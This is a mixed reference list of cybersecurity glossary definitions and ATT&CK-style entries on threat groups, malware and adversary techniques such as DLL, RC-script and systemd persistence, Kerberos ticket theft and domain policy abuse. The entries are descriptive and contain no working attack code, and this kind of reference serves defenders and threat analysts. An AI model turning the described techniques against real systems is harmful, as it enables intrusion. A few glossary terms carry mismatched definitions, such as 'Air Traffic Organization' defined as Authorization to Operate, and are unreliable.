Definition: The process that a CA uses to create a certificate for a web server or email user. (In the context of this practice guide, enrollment applies to the process of a certificate requester requesting a certificate, the CA issuing the certificate, and the requester retrieving the issued certificate).

Term: IREX
Definition: Iris Exchange – the NIST program supporting iris-based biometrics

Term: pedigree
Definition: The validation of the composition and provenance of technologies, products, and services is referred to as the pedigree. For microelectronics, this includes material composition of components. For software this includes the composition of open source and proprietary code, including the version of the component at a given point in time. Pedigrees increase the assurance that the claims suppliers assert about the internal composition and provenance of the products, services, and technologies they provide are valid.

Term: key sanitization
Definition: A technique for zeroization (e.g., overwriting with all zeros, all ones, or random data) of the target cryptographic keys.

Term: Federation Credential Service Provider
Definition: See Credential Service Provider.

Name: Terminal Services DLL
Type: attack-pattern
Description: Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.

Windows Services that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>. The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.

Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts. Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent Remote Desktop Protocol sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality. On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.

Term: <em>p</em>
Definition: First prime factor of the RSA modulus n.

Term: Service Provider
Definition: A provider of basic services or value-added services for operation of a network; generally refers to public carriers and other commercial enterprises.

Term: metacontrol
Definition: A control of, or about, a control. For example, a control that specifies how the desired or actual state data for another control is to be managed.

Term: KAS2-basic
Definition: The basic form of Key-Agreement Scheme 2.

Term: secret key
Definition: A cryptographic key, used with a secret key cryptographic algorithm, that is uniquely associated with one or more entities and should not be made public.

Term: GSS
Definition: An interconnected set of information resources under the same direct management control that shares common functionality. It normally includes hardware, software, information, data, applications, communications, and people.

Term: records
Definition: The recordings (automated and/or manual) of evidence of activities performed or results achieved (e.g., forms, reports, test results), which serve as a basis for verifying that the organization and the information system are performing as intended. Also used to refer to units of related data fields (i.e., groups of data fields that can be accessed by a program and that contain the complete set of information on particular items).

Term: information system boundary
Definition: All components of an information system to be authorized for operation by an authorizing official. This excludes separately authorized systems to which the information system is connected. Formerly known as "accreditation boundary".

Term: D/S
Definition: A distributed database service capable of storing information, such as certificates and CRLs, in various nodes or servers distributed across a network. (In the context of this practice guide, a directory services stores identity information and enables the authentication and identification of people and machines.)

Term: Network Administrator
Definition: A person who manages a network within an organization. Responsibilities include network security, installing new applications, distributing software upgrades, monitoring daily activity, enforcing licensing agreements, developing a storage management program, and providing for routine backups.

Term: digital twin definition
Definition: A machine-readable specification that describes features that may be modeled for a particular type of real-world entity.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to cause harm to an information system in the form of destruction, disclosure, adverse modification of data, and/or denial of service.

Term: Public key/public signature verification key
Definition: A cryptographic key that is used with an asymmetric (public key) cryptographic algorithm and is associated with a private key. The public key is associated with an owner and may be made public. In the case of digital signatures, the public key is used to verify a digital signature that was signed using the corresponding private key.

Term: Internet Protocol Security
Definition: A protocol that adds security features to the standard IP protocol to provide confidentiality and integrity services.

Term: Privacy Requirements
Definition: Requirements of an organization, information program, or system that are derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, procedures, or organizational mission and business case needs with respect to privacy.

Term: firewall
Definition: A part of a computer system or network that is designed to block unauthorized access while permitting outward communication.

Term: public key cryptography (PKC)
Definition: Cryptography that uses separate keys for encryption and decryption; also known as asymmetric cryptography.

Term: security design order of precedence
Definition: A design approach for minimizing the design basis for loss potential and using architectural features to provide structure for implementing engineered security features and devices.

Name: CORESHELL
Type: malware
Description: CORESHELL is a downloader used by APT28. The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.

Name: Orz
Type: malware
Description: Orz is a custom JavaScript backdoor used by Leviathan. It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files.

Term: Policy
Definition: A statement of objectives, rules, practices or regulations governing the activities of people within a certain context.

Name: RC Scripts
Type: attack-pattern
Description: Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.

Adversaries may establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution. Upon reboot, the system executes the script's contents as root, resulting in persistence.

Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as ESXi hypervisors, IoT, or embedded systems. As ESXi servers store most system files in memory and therefore discard changes on shutdown, leveraging `/etc/rc.local.d/local.sh` is one of the few mechanisms for enabling persistence across reboots.

Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of Launchd. This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts. To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.

Term: RBG seed
Definition: A secret value that is used to initialize a process (e.g., a deterministic random bit generator). Also see RNG seed.

Name: Compute Hijacking
Type: attack-pattern
Description: Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 

One common purpose for Compute Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive. Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Compute Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.

Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.

Term: DPC
Definition: An X.509 Derived PIV Authentication certificate with associated public and private key that is issued in accordance with the requirements specified in this document where the PIV Authentication certificate on the applicant’s PIV Card serves as the original credential. The Derived PIV Credential (DPC) is an additional common identity credential under Homeland Security Presidential Directive-12 and Federal Information Processing Standards (FIPS) 201 that is issued by a federal department or agency and is used with mobile devices.

Term: key
Definition: See “Cryptographic Key”.

Term: key transport
Definition: Process of exchanging public keys (and other information) in order to establish secure communications.

Name: Chimera
Type: intrusion-set
Description: Chimera is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.

Term: Cyber Attack
Definition: Any kind of malicious activity that attempts to collect, disrupt, deny, degrade, or destroy information system resources or the information itself.

Name: XPC Services
Type: attack-pattern
Description: Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.

Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler. This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct Exploitation for Privilege Escalation.

Term: PSK
Definition: A single secret key used by IPsec endpoints to authenticate endpoints to each other.

Name: Systemd Service
Type: attack-pattern
Description: Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources. Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. 

Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`). 

Inside the `.service` unit files, the following directives are used to execute commands: 

* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.
* `ExecReload` directive executes when a service restarts. 
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped. 

Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem. 

The `.service` file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions. 

Systemd services can be created via systemd generators, which support the dynamic generation of unit files. Systemd generators are small executables that run during boot or configuration reloads to dynamically create or modify systemd unit files by converting non-native configurations into services, symlinks, or drop-ins (i.e., Boot or Logon Initialization Scripts).

Term: risk executive (function)
Definition: An individual or group within an organization that helps to ensure that: (i) security and privacy risk-related considerations for individual information systems, to include the authorization decisions, are viewed from an organization-wide perspective with regard to the overall strategic goals and objectives of the organization in carrying out its missions and business functions; and (ii) managing information system-related security and privacy risks is consistent across the organization, reflects organizational risk tolerance, and is considered along with other organizational risks affecting mission/business success.

Term: selection statement
Definition: A control parameter that allows an organization to select a value from a list of pre-defined values provided as part of the control or control enhancement (e.g., selecting to either restrict an action or prohibit an action). See assignment and organization-defined control parameter.

Term: Tunnel Mode
Definition: IPsec mode that creates a new IP header for each protected packet.

Name: Evilnum
Type: intrusion-set
Description: Evilnum is a financially motivated threat group that has been active since at least 2018.

Term: EKEYx(Y)
Definition: Encrypt Y with the key KEYx

Name: Operating System Configuration
Type: course-of-action
Description: Operating System Configuration involves adjusting system settings and hardening the default configurations of an operating system (OS) to mitigate adversary exploitation and prevent abuse of system functionality. Proper OS configurations address security vulnerabilities, limit attack surfaces, and ensure robust defense against a wide range of techniques. This mitigation can be implemented through the following measures: 

Disable Unused Features:

- Turn off SMBv1, LLMNR, and NetBIOS where not needed.
- Disable remote registry and unnecessary services.

Enforce OS-level Protections:

- Enable Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG) on Windows.
- Use AppArmor or SELinux on Linux for mandatory access controls.

Secure Access Settings:

- Enable User Account Control (UAC) for Windows.
- Restrict root/sudo access on Linux/macOS and enforce strong permissions using sudoers files.

File System Hardening:

- Implement least-privilege access for critical files and system directories.
- Audit permissions regularly using tools like icacls (Windows) or getfacl/chmod (Linux/macOS).

Secure Remote Access:

- Restrict RDP, SSH, and VNC to authorized IPs using firewall rules.
- Enable NLA for RDP and enforce strong password/lockout policies.

Harden Boot Configurations:

- Enable Secure Boot and enforce UEFI/BIOS password protection.
- Use BitLocker or LUKS to encrypt boot drives.

Regular Audits:

- Periodically audit OS configurations using tools like CIS Benchmarks or SCAP tools.

*Tools for Implementation*

Windows:

- Microsoft Group Policy Objects (GPO): Centrally enforce OS security settings.
- Windows Defender Exploit Guard: Built-in OS protection against exploits.
- CIS-CAT Pro: Audit Windows security configurations based on CIS Benchmarks.

Linux/macOS:

- AppArmor/SELinux: Enforce mandatory access controls.
- Lynis: Perform comprehensive security audits.
- SCAP Security Guide: Automate configuration hardening using Security Content Automation Protocol.

Cross-Platform:

- Ansible or Chef/Puppet: Automate configuration hardening at scale.
- OpenSCAP: Perform compliance and configuration checks.

Term: post-quantum algorithm
Definition: A cryptographic algorithm that is believed to be secure, even against adversaries who possess a cryptanalytically relevant quantum computer.

Term: Key management function
Definition: Functions used 1) to establish cryptographic keys, certificates and the information associated with them; 2) for the accounting of all keys and certificates; 3) for key storage and recovery; 4) for revocation and replacement (as needed); and 5) for key destruction.

Term: message digest
Definition: The result of applying a hash function to data.

Term: Mesh Encryption
Definition: A special case of many host-to-host VPNs. Whenever one host in a network wishes to communicate with another host in the network, it first establishes an IPsec connection. Typically, adding or removing one node in the mesh does not require reconfiguration of the other nodes.

Term: <strong>Shall</strong>
Definition: A requirement for Federal Government use.

Term: <em>p</em>
Definition: An FFC domain parameter; an odd prime number that determines the size of the finite field <i>GF</i>(<i>p</i>).

Term: impact level
Definition: Refers to the three broadly defined impact-levels in [FIPS 200] that categorize the impact of a security breach as Low, Moderate or High.

Term: service
Definition: Performance of activities, work, or duties.

Term: Predictability
Definition: Enabling reliable assumptions by individuals, owners, and operators about personal information and its processing by an information system.

Term: Chief Privacy Officer
Definition: See Senior Agency Official for Privacy.

Name: Threat Group-3390
Type: intrusion-set
Description: Threat Group-3390 is a Chinese threat group that has extensively used strategic Web compromises to target victims. The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.

Term: TA
Definition: Entity authorized to act as a representative of an Agency in confirming Subscriber identification during the registration process. Trusted Agents do not have automated interfaces with Certification Authorities.

Name: PROMETHIUM
Type: intrusion-set
Description: PROMETHIUM is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. PROMETHIUM has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics.

Term: end-point protection platform
Definition: Safeguards implemented through software to protect end-user machines such as workstations and laptops against attack (e.g., antivirus, antispyware, anti-adware, personal firewalls, host-based intrusion detection and prevention systems, etc.).

Term: Conventional BIOS
Definition: Legacy boot firmware used in many x86-compatible computer systems. Also known as the legacy BIOS.

Term: information system security officer
Definition: Individual with assigned responsibility for maintaining the appropriate operational security posture for an information system or program.

Term: network
Definition: An open communications medium, typically the internet, used to transport messages between the claimant and other parties. Unless otherwise stated, networks are assumed to be open and subject to active (e.g., impersonation, session hijacking) and passive (e.g., eavesdropping) attacks at any point between the parties (e.g., claimant, verifier, CSP, RP).

Term: audit trail
Definition: A chronological record that reconstructs and examines the sequence of activities surrounding or leading to a specific operation, procedure, or event in a security relevant transaction from inception to final result.

Term: exclusive-OR
Definition: Bitwise logical “exclusive-or”, where 0⊕ 0 = 0, 0⊕ 1 = 1, 1⊕ 0 = 1, and 1⊕ 1 = 0. For example: 01101⊕ 11010 = 10111.

Term: Transport Layer Security (TLS)
Definition: Provides privacy and reliability between two communicating applications. It is designed to encapsulate other protocols, such as HTTP. SSL v3.0 was released in 1996. It has been succeeded by IETF's TLS.

Term: system element
Definition: A hardware, software, firmware part or element of a larger PNT system with well-defined inputs and outputs and a specific function.

Term: atomic oscillator
Definition: An oscillator that uses the quantized energy levels in atoms or molecules as the source of its resonance. The laws of quantum mechanics dictate that the energies of a bound system, such as an atom, have certain discrete values. An electromagnetic field at a particular frequency can boost an atom from one energy level to a higher one, or an atom at a high energy level can drop to a lower level by emitting energy. The resonance frequency, fo, of an atomic oscillator is the difference between the two energy levels divided by Planck’s constant, h.

The principle underlying the atomic oscillator is that since all atoms of a specific element are identical, they should produce exactly the same frequency when they absorb or release energy. In theory, the atom is a perfect “pendulum” whose oscillations are counted to measure a time interval. The national frequency standards developed by NIST and other laboratories derive their resonance frequency from the cesium atom and typically use cesium fountain technology. Rubidium oscillators are the lowest priced and most common atomic oscillators, but cesium beam and hydrogen maser atomic oscillators are also sold commercially in much smaller quantities.

Name: MegaCortex
Type: malware
Description: MegaCortex is ransomware that first appeared in May 2019. MegaCortex has mainly targeted industrial organizations.

Term: SCA
Definition: Confidence that the supply chain will produce and deliver elements, processes, and information that function as expected.

Term: Fixed Field
Definition: In the deterministic construction of IVs, the field that identifies the device or context for the instance of the authenticated encryption function.

Term: scoping considerations
Definition: A part of tailoring guidance providing organizations with specific considerations on the applicability and implementation of security and privacy controls in the control baselines. Considerations include policy or regulatory, technology, physical infrastructure, system component allocation, public access, scalability, common control, operational or environmental, and security objective.

Term: Team
Definition: A number of persons associated together in work or activity. As used in this publication, a team is a group of individuals that has been assigned by an organization’s management the responsibility and capability to carry out a defined function or set of defined functions. Designations for teams as used in this publication are simply descriptive. Different organizations may have different designations for teams that carry out the functions described herein.

Term: Bluetooth
Definition: A wireless protocol that allows two Bluetooth enabled devices to communicate with each other within a short distance (e.g., 30 ft.).

Name: SodaMaster
Type: malware
Description: SodaMaster is a fileless malware used by menuPass to download and execute payloads since at least 2020.

Term: <em>{x, y}</em>
Definition: A set containing the integers x and y.

Term: CA
Definition: The study of mathematical techniques for attempting to defeat cryptographic techniques and information system security. This includes the process of looking for errors or weaknesses in the implementation of an algorithm or in the algorithm itself.

Name: FIN10
Type: intrusion-set
Description: FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations.

Term: loc-RIB
Definition: Routes selected from the adj-RIB-In table.

Term: inter-process communications (IPC)
Definition: An operating system mechanism that allows processes to communicate. Mechanisms include (but are not limited to) Transmission Control Protocol (TCP) sockets, User Datagram Protocol (UDP) sockets, Unix Domain Sockets, System V/Portable Operating System Interface for Unix (POSIX) message queues, named pipes (also called a Unix FIFO), System V/POSIX shared memory, signals, System V/POSIX semaphores, and pipes.

Term: security assessment
Definition: See Security Control Assessment.

Term: Source authentication
Definition: The process of providing assurance about the source of information; sometimes called data-origin authentication. Compare with Identity authentication.

Term: <em>A</em>
Definition: Additional input that is bound to the secret keying material; a byte string.

Term: collision
Definition: For a given function, a pair of distinct input values that yield the same output value.

Term: metadata
Definition: Information that describes the characteristics of data, including structural metadata that describes data structures (i.e., data format, syntax, semantics) and descriptive metadata that describes data contents (i.e., security labels).

Term: cookie
Definition: A small file that stores information for a Web site.

Name: User Activity Based Checks
Type: attack-pattern
Description: Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro or waiting for a user to double click on an embedded image to activate.

Name: Pre-OS Boot
Type: attack-pattern
Description: Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.

Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.

Term: categorization
Definition: See security categorization.

Term: Scheme Owner
Definition: Person or organization responsible for the development and maintenance of a conformity assessment system or conformity assessment scheme.

Term: String
Definition: A bitstring is an ordered sequence of 0’s and 1’s.

Term: Web Services Description Language (WSDL)
Definition: An XML format for describing network services as a set of endpoints operating on messages containing either document- oriented or procedure-oriented information. WSDL complements the UDDI standard by providing a uniform way of describing the abstract interface and protocol bindings and deployment details of arbitrary network services.

Name: Axiom
Type: intrusion-set
Description: Axiom is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between Axiom and Winnti Group but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.

Term: key transport
Definition: The transport of a key and other keying material from an entity that either owns or generates the key to another entity that is intended to use the key.

Term: contamination
Definition: Security incident that results in the transfer of classified information or Controlled Unclassified Information onto an information system not authorized to store or process that information.

Term: provisional security impact values
Definition: The initial or conditional impact determinations made until all considerations are fully reviewed, analyzed, and accepted in the subsequent categorization steps by appropriate officials. [NIST SP 800-60, adapted]

Term: Application virtualization
Definition: A virtual implementation of the application programming interface (API) that a running application expects to use.

Name: Steal or Forge Kerberos Tickets
Type: attack-pattern
Description: Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable Pass the Ticket. Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC). Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.

On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.

Name: BlackMould
Type: malware
Description: BlackMould is a web shell based on China Chopper for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by GALLIUM against telecommunication providers.

Name: Responder
Type: tool
Description: Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Term: system interconnection
Definition: the requirements for communication or interconnection by an ITsystem with one or more other IT systems or networks, to share processing capability or pass data and information in support of multi-organizational or public programs.

Term: NC
Definition: A time-varying value that has (at most) an acceptably small chance of repeating. For example, the nonce may be a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Name: Service Exhaustion Flood
Type: attack-pattern
Description: Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well. Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.

One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.

Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.

Name: Sakula
Type: malware
Description: Sakula is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015.

Term: Relationship Identifier
Definition: Identifying information where the value is a relationship to another asset.

Name: Cinnamon Tempest
Type: intrusion-set
Description: Cinnamon Tempest is a China-based threat group that has been active since at least 2021 deploying multiple strains of ransomware based on the leaked Babuk source code. Cinnamon Tempest does not operate their ransomware on an affiliate model or purchase access but appears to act independently in all stages of the attack lifecycle. Based on victimology, the short lifespan of each ransomware variant, and use of malware attributed to government-sponsored threat groups, Cinnamon Tempest may be motivated by intellectual property theft or cyberespionage rather than financial gain.

Term: sensitive information
Definition: Information where the loss, misuse, or unauthorized access or modification could adversely affect the national interest or the conduct of federal programs, or the privacy to which individuals are entitled under 5 U.S.C. Section 552a (the Privacy Act); that has not been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy.

Term: ICB
Definition: Initial Counter Block

Term: Signature validation
Definition: The mathematical verification of the digital signature along with obtaining the appropriate assurances (e.g., public-key validity, private-key possession, etc.).

Term: multi-factor authentication
Definition: Authentication using two or more different factors to achieve authentication. Factors include: (i) something you know (e.g., password/PIN); (ii) something you have (e.g., cryptographic identification device, token); or (iii) something you are (e.g., biometric). See Authenticator.

Term: KDF
Definition: Key Derivation Function.

Term: collision
Definition: An instance of duplicate sample values occurring in a dataset.

Term: DI
Definition: The property that data has not been changed, destroyed, or lost in an unauthorized or accidental manner.

Name: Stealth Falcon
Type: intrusion-set
Description: Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed.

Term: key pair
Definition: Two mathematically related keys having the properties that (1) one key can be used to encrypt a message that can only be decrypted using the other key, and (ii) even knowing one key, it is computationally infeasible to discover the other key.

Term: concept type
Definition: A category of concepts found within a particular domain.

Term: Extended CPE Dictionary
Definition: A dictionary that an organization may create to house identifier names not found in the Official CPE Dictionary.

Term: Backup (key and/or metadata)
Definition: To copy a key and/or metadata to a medium that is separate from that used for operational storage and from which the key and/or metadata can be recovered if the original values in operational storage are lost or modified.

Term: warning banner
Definition: The opening screen that informs users of the implications of accessing a computer resource (e.g., consent to monitor). A security banner. System use notification.

Term: Architecture Design Principles
Definition: Best practices derived from large-scale information-sharing implementations that serve as the overall guidance for building security and privacy services for HIEs.

Term: Information System Security Engineering
Definition: Process that captures and refines information security requirements and ensures that their integration into information technology component products and information systems through purposeful security design or configuration.

Term: systems security engineer
Definition: Individual assigned responsibility for conducting systems security engineering activities.

Term: eXecute In Place
Definition: A facility that allows code to be executed directly from flash memory without loading the code into RAM.

Term: Exposure
Definition: Extent to which an organization and/or stakeholder is subject to a risk.

Term: Air Traffic Organization
Definition: Authorization to Operate; One of three possible decisions concerning an issuer made by a Designated Authorizing Official after all assessment activities have been performed stating that the issuer is authorized to perform specific PIV Card and/or Derived Credential issuance services.

Term: communications cover
Definition: See cover (TRANSEC).

Term: Lightweight node
Definition: A blockchain node that does not need to store a full copy of the blockchain and often passes its data to full nodes to be processed.

Name: BUBBLEWRAP
Type: malware
Description: BUBBLEWRAP is a full-featured, second-stage backdoor used by the admin@338 group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities.

Term: DRBG mechanism
Definition: The portion of an RBG that includes the functions necessary to instantiate and uninstantiate the RBG, generate pseudorandom bits, (optionally) reseed the RBG and test the health of the DRBG mechanism. Approved DRBG mechanisms are specified in SP 800-90A.

Term: ROC
Definition: A curve that plots the true positive rate versus the false positive rate for a classifier.

Term: insider threat
Definition: The threat that an insider will use her/his authorized access, wittingly or unwittingly, to do harm to the security of the United States. This threat can include damage to the United States through espionage, terrorism, unauthorized disclosure, or through the loss or degradation of departmental resources or capabilities.

Term: Permutation
Definition: An invertible function.

Term: Rank Test
Definition: The purpose of this test is to check for linear dependence among fixed length substrings of the original sequence.

Term: cyber incident
Definition: Any observable occurrence in a network or system.

Term: differential privacy
Definition: A mathematical framework that quantifies privacy risk to individuals as a consequence of data collection and subsequent data release.

Term: system security plan
Definition: A document that describes how an organization meets the security requirements for a system or how an organization plans to meet the requirements. In particular, the system security plan describes the system boundary; the environment in which the system operates; how the security requirements are implemented; and the relationships with or connections to other systems.

Term: area under the curve
Definition: A measure of the ability of a classifier to distinguish between classes in machine learning. A higher AUC means that a model performs better when dis­tinguishing between the two classes. AUC measures the entire two-dimensional area under the receiver operating characteristic (ROC) curve.

Term: Electronic Protected Health Information
Definition: Information that comes within paragraphs (1)(i) or (1)(ii) of the definition of protected health information (see “protected health information”).

Name: Domain or Tenant Policy Modification
Type: attack-pattern
Description: Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.

Modifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.

With sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include: 

* modifying GPOs to push a malicious Scheduled Task to computers throughout the domain environment
* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to forge access tokens that will subsequently be accepted by victim domain resources
* changing configuration settings within the AD environment to implement a Rogue Domain Controller.
* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant 

Adversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

Term: specification
Definition: An information item that identifies, in a complete, precise, verifiable manner, the requirements, design, behavior, or other expected characteristics of a system, service, or process.

Term: nonlocal maintenance
Definition: Maintenance activities conducted by individuals communicating through a network; either an external network (e.g., the Internet) or an internal network.

Term: safeguards
Definition: Protective measures prescribed to meet the security objectives (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management controls, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.

Term: Normal (Gaussian) Distribution
Definition: A continuous distribution whose density function is given by f(x;μ;σ)=1/√(〖2πσ〗^2 ) e^(-〖1/2 ((x-μ)/σ)〗^2 ) , where μ and σ are location and scale parameters.

Term: Industrial Security
Definition: The portion of internal security that refers to the protection of industrial installations, resources, utilities, materials, and classified information essential to protect from loss or damage.

Term: penetration
Definition: Unauthorized access to a Federal Government or critical infrastructure network, information system, or application.

Term: Feature set
Definition: The set of all features associated with a single artifact is its feature set. Each algorithm must include a criteria by which candidate features are selected for inclusion in this set. For example, an algorithm might select all the (byte, offset) pairs produced by reading every 16th byte in the artifact.

Term: XOF
Definition: A function on bit strings in which the output can be extended to any desired length.

Term: DSA
Definition: Digital Signature Algorithm specified in [FIPS 186].

Term: absolute error
Definition: The absolute difference between the noisy and unaltered versions of a query’s output.

Term: approved
Definition: FIPS approved or NIST Recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation or 3) specified in a list of NIST-approved security functions.

Term: runtime
Definition: The period during which a computer program is executing.

Term: token
Definition: Something the claimant possesses and controls (typically a cryptographic module or password) that is used to authenticate the claimant’s identity.

Term: Development Operations (DevOps)
Definition: A set of practices for automating the processes between software development and information technology operations teams so that they can build, test, and release software faster and more reliably. The goal is to shorten the systems development life cycle and improve reliability while delivering features, fixes, and updates frequently in close alignment with business objectives.

Term: Generalized TTL Security Mechanism (GTSM)
Definition: A configuration in which BGP peers set the TTL value to 255 as a means of preventing forged packets from distant attackers.

Term: Capacity Planning
Definition: Systematic determination of resource requirements for the projected output, over a specific period.

